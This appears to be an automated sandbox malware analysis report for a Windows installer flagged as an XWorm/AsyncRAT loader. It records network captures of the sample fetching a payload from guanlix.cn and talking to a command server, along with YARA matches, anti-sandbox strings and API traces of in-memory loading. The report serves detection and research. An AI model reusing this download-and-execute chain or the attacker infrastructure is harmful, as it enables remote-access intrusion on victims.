Jul 2, 2024 19:24:02.847891092 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:03.173149109 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:03.175014973 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:03.180046082 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:04.030421972 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:04.035553932 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:04.361036062 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:04.362552881 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:04.367476940 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:16.374275923 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:16.379201889 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:16.707318068 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:16.710900068 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:16.715789080 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:18.457242966 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:18.498965979 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:27.983815908 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:27.988684893 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:28.313559055 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:28.315072060 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:28.320049047 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:30.546158075 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:30.551146984 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:30.877288103 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:30.881458998 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:30.887142897 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:35.780728102 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:35.785949945 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:35.889899015 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:35.894917011 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:35.905709028 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:35.911847115 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:36.111815929 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:36.113749027 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:36.118689060 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:36.345601082 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:36.347584009 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:36.353611946 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:36.579180002 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:36.580519915 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:36.585402012 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:46.624531031 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:46.629390955 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:46.956166983 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:46.957577944 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:46.962506056 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:48.480602980 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:48.530288935 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:49.452451944 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:49.457381010 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:49.782613993 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:49.784506083 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:49.789484024 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:52.077572107 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:52.083112955 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:52.124396086 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:52.342902899 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:52.457667112 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:52.457775116 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:52.457781076 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:52.457860947 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:52.459369898 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:52.462790966 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:52.465485096 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:53.029284954 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:53.031183004 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:53.036181927 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:53.077976942 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:53.084229946 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:53.120083094 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:53.123332977 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:53.170042992 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:53.662409067 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:53.664506912 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:53.669692993 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:58.671253920 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:58.676076889 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:59.001698017 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:24:59.006995916 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:24:59.014929056 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:25:10.530611992 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:25:10.535440922 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:25:10.860430002 CEST	7000	49701	59.56.110.103	192.168.2.7
Jul 2, 2024 19:25:10.861341953 CEST	49701	7000	192.168.2.7	59.56.110.103
Jul 2, 2024 19:25:10.866197109 CEST	7000	49701	59.56.110.103	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 19:21:06.538072109 CEST	62013	53	192.168.2.7	1.1.1.1
Jul 2, 2024 19:21:07.085867882 CEST	53	62013	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 2, 2024 19:21:06.538072109 CEST	192.168.2.7	1.1.1.1	0x3dc9	Standard query (0)	guanlix.cn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 2, 2024 19:21:07.085867882 CEST	1.1.1.1	192.168.2.7	0x3dc9	No error (0)	guanlix.cn		91.208.240.157	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

guanlix.cn:881

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	91.208.240.157	881	5508	C:\Users\user\Desktop\103-o_Installer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 19:21:07.130027056 CEST	94	OUT	GET /103.ccp HTTP/1.1 User-Agent: Download Host: guanlix.cn:881 Cache-Control: no-cache
Jul 2, 2024 19:21:08.047209024 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Tue, 02 Jul 2024 17:20:51 GMT Content-Type: application/octet-stream Content-Length: 71938 Last-Modified: Thu, 13 Jun 2024 01:27:05 GMT Connection: keep-alive ETag: "666a4ae9-11902" Accept-Ranges: bytes Data Raw: e8 88 bb 00 00 88 bb 00 00 fb 5d ff e0 ef bf b0 5f 31 b0 bd 8e 81 b3 52 e4 ec 19 18 69 e6 c6 e6 a5 b3 08 46 07 63 45 5b 43 00 00 00 00 59 79 03 8d 8b d8 c6 a7 da 49 b9 0e e8 ce 1a 60 47 d1 60 39 01 b8 41 a0 c0 c2 9d f2 92 9b 3c 89 1f b7 87 78 70 51 26 50 26 83 e6 17 35 09 23 81 06 b9 48 cd 72 66 0d 87 b6 77 0b 0f c2 35 2d 7a 93 7b 5c b8 88 68 74 84 a8 6f 3e 2f 02 82 5e 05 8e 18 33 c3 21 b5 0d 05 21 4d e1 fc d9 d8 fd 89 73 41 1c 94 91 41 ca 77 f0 2d 2b e3 b8 92 0f b3 50 b3 75 35 db 9c e5 c4 a6 ab 7e 6b bb 49 eb 77 17 bb b6 25 e5 f6 41 09 9c 00 0d 50 e8 31 50 38 7e a6 e4 63 e3 1e a1 e1 e7 9f 2a 34 ef 53 d3 36 74 85 bf 46 6c 73 bc 95 6a 26 54 a6 3b 76 73 8c 44 e9 ce 2e 87 19 62 a0 86 44 e3 ee 0d 30 79 1f 37 29 a3 4a f8 46 97 37 33 82 b3 ba 7e b8 60 8c d2 8f 4c d3 6a d9 3d e9 2c 45 01 a1 9a 4b 74 66 f6 bc ef e6 7c 41 4e 94 1f 04 a7 0f ef fb 89 e3 d8 d8 d2 9f a1 6a 54 73 48 27 b4 89 0d 91 3b d9 b6 a0 9e 5c 36 98 41 d7 65 ac 16 0d a3 24 3d 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: ]_1RiFcE[CYyI`G`9A<xpQ&P&5#Hrfw5-z{\hto>/^3!!MsAAw-+Pu5~kIw%AP1P8~c4S6tFlsj&T;vsD.bD0y7)JF73~`Lj=,EKtf\|ANjTsH';\6Ae$=($=V3O ,bfBC=]\HC{}Z(Y'+2jwOa&^^{Rj\|"/}"=jVP)C8h`mlTK#vZl:]}j]]}FuSOSu1R @Rq)6HHX}TOkB$MGqHI(1SG`!t<[AzA?5ufcj6<;;Q^l3.5Nh;XeA~WJnE JU[ldIb[=0f>_mc

Target ID:	0
Start time:	13:21:05
Start date:	02/07/2024
Path:	C:\Users\user\Desktop\103-o_Installer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\103-o_Installer.exe"
Imagebase:	0x3a0000
File size:	249'344 bytes
MD5 hash:	DC4B9BE7A5645D5C7FD18A4AC175830C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3671692196.0000000003141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	4.7%
Signature Coverage:	2.1%
Total number of Nodes:	746
Total number of Limit Nodes:	64

Executed Functions

Function 053AAFD0 Relevance: 9.7, Strings: 7, Instructions: 908COMMON

Download Yara Rule

Strings

(oq, xrefs: 053AB0C9
(oq, xrefs: 053AB4DF
(oq, xrefs: 053AB00E
(oq, xrefs: 053AB192
(oq, xrefs: 053AB4EF
(oq, xrefs: 053AB5A1
(oq, xrefs: 053AB0F5

Memory Dump Source

Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq$(oq$(oq$(oq
API String ID: 0-2785030291
Opcode ID: d7aaa6fa68cf118efa6fc9529790481dacec52f2563f77a55886742990544aee
Instruction ID: 937262a5f2582a32cdde2d574eaa95a7f30be81cb1cb9edd61ab9b3c5390d5da
Opcode Fuzzy Hash: d7aaa6fa68cf118efa6fc9529790481dacec52f2563f77a55886742990544aee
Instruction Fuzzy Hash: C9824832A04209DFCB14CF69D994AAEFBF2FF88314F158569E8469B2A5D770E841CB50

Function 053AA290 Relevance: 4.6, Strings: 3, Instructions: 889COMMON

Download Yara Rule

Strings

(oq, xrefs: 053AA7BA
(oq, xrefs: 053AAAF2
(oq, xrefs: 053AAB00

Memory Dump Source

Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq
API String ID: 0-3376450984
Opcode ID: e82697b6818493290fbd97e9ad7f54619ddf2cf6ce2010fe767974663b80e6dc
Instruction ID: d2bfeea7e9f6d4e737a483e5f064bb579a67651c25975fa150b1a1057e4f4421
Opcode Fuzzy Hash: e82697b6818493290fbd97e9ad7f54619ddf2cf6ce2010fe767974663b80e6dc
Instruction Fuzzy Hash: 1F725B72A002199FDB15DF69C954AAEBBF6FF88300F148169E846EB3A4DB74DC41CB50

Function 053AE918 Relevance: 2.2, Strings: 1, Instructions: 966COMMON

Download Yara Rule

Strings

Teq, xrefs: 053AF4A3

Memory Dump Source

Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 11f115f6043608448827a5da2d1d23ef673aff27649dfea5b3091ece30238932
Instruction ID: 14420a1df1b8be924a053335f94e765f5c7c6935e6c67f392a406165abdd2a8a
Opcode Fuzzy Hash: 11f115f6043608448827a5da2d1d23ef673aff27649dfea5b3091ece30238932
Instruction Fuzzy Hash: 12628039B00310CBDB18EB75D868B6E77A7EFC5710F154169E8069B3A4DF399C828B91

Function 003A25C8 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003A25C8

Part of subcall function 003A221D: __EH_prolog.LIBCMT ref: 003A2222

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6ccec3e5f62dcff7b53ef0427f6f91d8b9ef952e0cc2d517c2a72ad1e89c4f83
Instruction ID: 8d723cd78098be37aed0c8598b6970fa52ef6f1fce7e1c311263d90c122087ed
Opcode Fuzzy Hash: 6ccec3e5f62dcff7b53ef0427f6f91d8b9ef952e0cc2d517c2a72ad1e89c4f83
Instruction Fuzzy Hash: A1114C75901258EFCF12DF98CA90AAEBBB4FF19314F10805EE5126B261C7759E00DFA1

Function 053A4D08 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\Vhm, xrefs: 053A4FBF

Memory Dump Source

Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd

Similarity

API ID:
String ID: \Vhm
API String ID: 0-1451868494
Opcode ID: f749187bdcf0f3fc9a6e56b4960468edd704ea9f82a83ef1bf07292f68cb1160
Instruction ID: f18e634ccd07de81810fe953dee6b7221f63ff9b25b57a730afee11f97ac91e3
Opcode Fuzzy Hash: f749187bdcf0f3fc9a6e56b4960468edd704ea9f82a83ef1bf07292f68cb1160
Instruction Fuzzy Hash: FCB12D71E002099FDF14CFA9D885BEDBBF2FF88314F148529D815AB294EBB49845CB91

Function 053A55D8 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3672265109.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_103-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deddfae4159784561ad5519f9daceea9e369e30bb050a3edc601fdf305a2f71c
Instruction ID: ab78f2a4c7d3adf0e7a4135e4e247bb083a27939da57e23df55da957411f9b25
Opcode Fuzzy Hash: deddfae4159784561ad5519f9daceea9e369e30bb050a3edc601fdf305a2f71c
Instruction Fuzzy Hash: F8B12972E00209DFDF15CFA9D885BADBBF2FB88314F148529D815EB294EB749845CB81

Function 003A11E1 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 89
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount64.KERNEL32 ref: 003A11EF
Sleep.KERNEL32(0000012C), ref: 003A11F9
GetTickCount64.KERNEL32 ref: 003A11FF

Part of subcall function 003A4424: __vwprintf_l.LIBCMT ref: 003A4432

CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.cod,80000000,00000001,00000000,00000004,00000080,00000000), ref: 003A1244
GetFileSize.KERNEL32(00000000,00000000), ref: 003A124E
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 003A125F
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003A1270
CloseHandle.KERNEL32(00000000), ref: 003A1277

Strings

sandbox!!!, xrefs: 003A1222
v4:%d, xrefs: 003A120C
C:\Users\Public\Downloads\ind.cod, xrefs: 003A123F

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: File$Count64Tick$AllocCloseCreateHandleReadSizeSleepVirtual__vwprintf_l
String ID: C:\Users\Public\Downloads\ind.cod$sandbox!!!$v4:%d
API String ID: 1694741105-2571094725
Opcode ID: 990bb8d545a53f0232267ac25b8481a9311d14ed8c60dd31e6376acaafd5ea9b
Instruction ID: a45d7724c295ecc755c6a8635de2df5ebb2f3e9637e6cd904ad0c2a3b69820fd
Opcode Fuzzy Hash: 990bb8d545a53f0232267ac25b8481a9311d14ed8c60dd31e6376acaafd5ea9b
Instruction Fuzzy Hash: 6711B473A042287FE72267F9AC4AFAB7A6CDB87774F210626FB05D2190D5A05C0082B1

Function 003A2E5D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 003A2E5D
InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 003A2E79
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 003A2E96
InternetCloseHandle.WININET(?), ref: 003A2F2A

Part of subcall function 003A2D2E: __EH_prolog.LIBCMT ref: 003A2D33

InternetReadFile.WININET(?,?,00001000,?), ref: 003A2EFC
InternetCloseHandle.WININET(?), ref: 003A2F12

Strings

Download, xrefs: 003A2E74

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: Internet$CloseH_prologHandleOpen$FileRead
String ID: Download
API String ID: 2208602198-2171396134
Opcode ID: 367256692e4e5bcc2cbca1c1f668c1a631a0730165b7a04c66f6381792a2c1b1
Instruction ID: 2ab3ec8a744acb6850ea585317a619e15e9f0e56107f8abcec423a9a7eb046e3
Opcode Fuzzy Hash: 367256692e4e5bcc2cbca1c1f668c1a631a0730165b7a04c66f6381792a2c1b1
Instruction Fuzzy Hash: D121077590011AEEEF229B98CC85FEFBB7CFB05354F10026AB616A6191D7705E84DE60

Function 003A2E58 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 003A2E5D
InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 003A2E79
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 003A2E96
InternetCloseHandle.WININET(?), ref: 003A2F2A

Part of subcall function 003A2D2E: __EH_prolog.LIBCMT ref: 003A2D33

InternetReadFile.WININET(?,?,00001000,?), ref: 003A2EFC
InternetCloseHandle.WININET(?), ref: 003A2F12

Strings

Download, xrefs: 003A2E74

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: Internet$CloseH_prologHandleOpen$FileRead
String ID: Download
API String ID: 2208602198-2171396134
Opcode ID: 44d5abe3df26e953af9c2058ef2be5a2e72b8e2b9943a5c7a6e5756017e0d34e
Instruction ID: 5dfe51dbfc2dfda67f96d05b9f07a70ce7f66cc8208fe320f6ee25f05c52d360
Opcode Fuzzy Hash: 44d5abe3df26e953af9c2058ef2be5a2e72b8e2b9943a5c7a6e5756017e0d34e
Instruction Fuzzy Hash: 0B113A75900119EFEB129B98CC85FEFBB7CEB49354F10016AF616B6191C6705E84DA20

Function 02EDFFE7 Relevance: 7.6, APIs: 5, Instructions: 90
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000000,00000002,?,02EDFCB5,00000000), ref: 02EDFFF5
VirtualProtect.KERNEL32(00000000,0000000C,00000040,?,?,02EDFCB5,00000000), ref: 02EE0035
VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 02EE0068
VirtualProtect.KERNEL32(00000000,004014A4,00000040,?), ref: 02EE0093
VirtualProtect.KERNEL32(00000000,004014A4,?,?), ref: 02EE00BD

Memory Dump Source

Source File: 00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ed0000_103-o_Installer.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
Instruction ID: 861a05e5cc3365fe11dc3861ee29d149215e9d8934f262f7bc09e9695adbc1fb
Opcode Fuzzy Hash: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
Instruction Fuzzy Hash: D921C5B224130A6FDB609A64CC88E7B77ECEB84305B045C3DBE47E2450EBB4E9448A60

Function 003A297F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 003A297F
_Fputc.LIBCPMT ref: 003A29E4
_Fputc.LIBCPMT ref: 003A2ABA

Strings

, xrefs: 003A2A91

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: Fputc$H_prolog
String ID:
API String ID: 1896196775-3916222277
Opcode ID: bdaf987eb92baa9bad55c814e67242334d8216569f66f1728ea4cae15efbe1bc
Instruction ID: 85b5c48841ce87d0a10af4aa0d7734f82ea945cfdeb0167a501043fb63a1ee3f
Opcode Fuzzy Hash: bdaf987eb92baa9bad55c814e67242334d8216569f66f1728ea4cae15efbe1bc
Instruction Fuzzy Hash: D24170329016099FCF26CB98C940AEFB7F6FF5A710F21051EE552A7680DB71AD44CB61

Function 02EE00CD Relevance: 6.1, APIs: 4, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(00000000,000016CC,00000040,?), ref: 02EE011B
VirtualProtect.KERNEL32(00000000,000016CC,?,?), ref: 02EE014E
VirtualProtect.KERNEL32(00000000,00402AD1,00000040,?), ref: 02EE0179
VirtualProtect.KERNEL32(00000000,00402AD1,?,?), ref: 02EE01A3

Memory Dump Source

Source File: 00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ed0000_103-o_Installer.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
Instruction ID: ba40efc57612b26495d854f80d2e0acda064efd447bc176ad2a3584458e38386
Opcode Fuzzy Hash: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
Instruction Fuzzy Hash: 8B2188B22447456FEB209A61CC88F7777FCEB88345B04583DBA87E5541EBB4E9058A70

Function 003A2F3D Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003A1186: __time64.LIBCMT ref: 003A118E
Part of subcall function 003A1186: _rand.LIBCMT ref: 003A119E
Part of subcall function 003A1186: _rand.LIBCMT ref: 003A11AD

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 003A2F4E

Part of subcall function 003A2E58: __EH_prolog.LIBCMT ref: 003A2E5D
Part of subcall function 003A2E58: InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 003A2E79
Part of subcall function 003A2E58: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 003A2E96
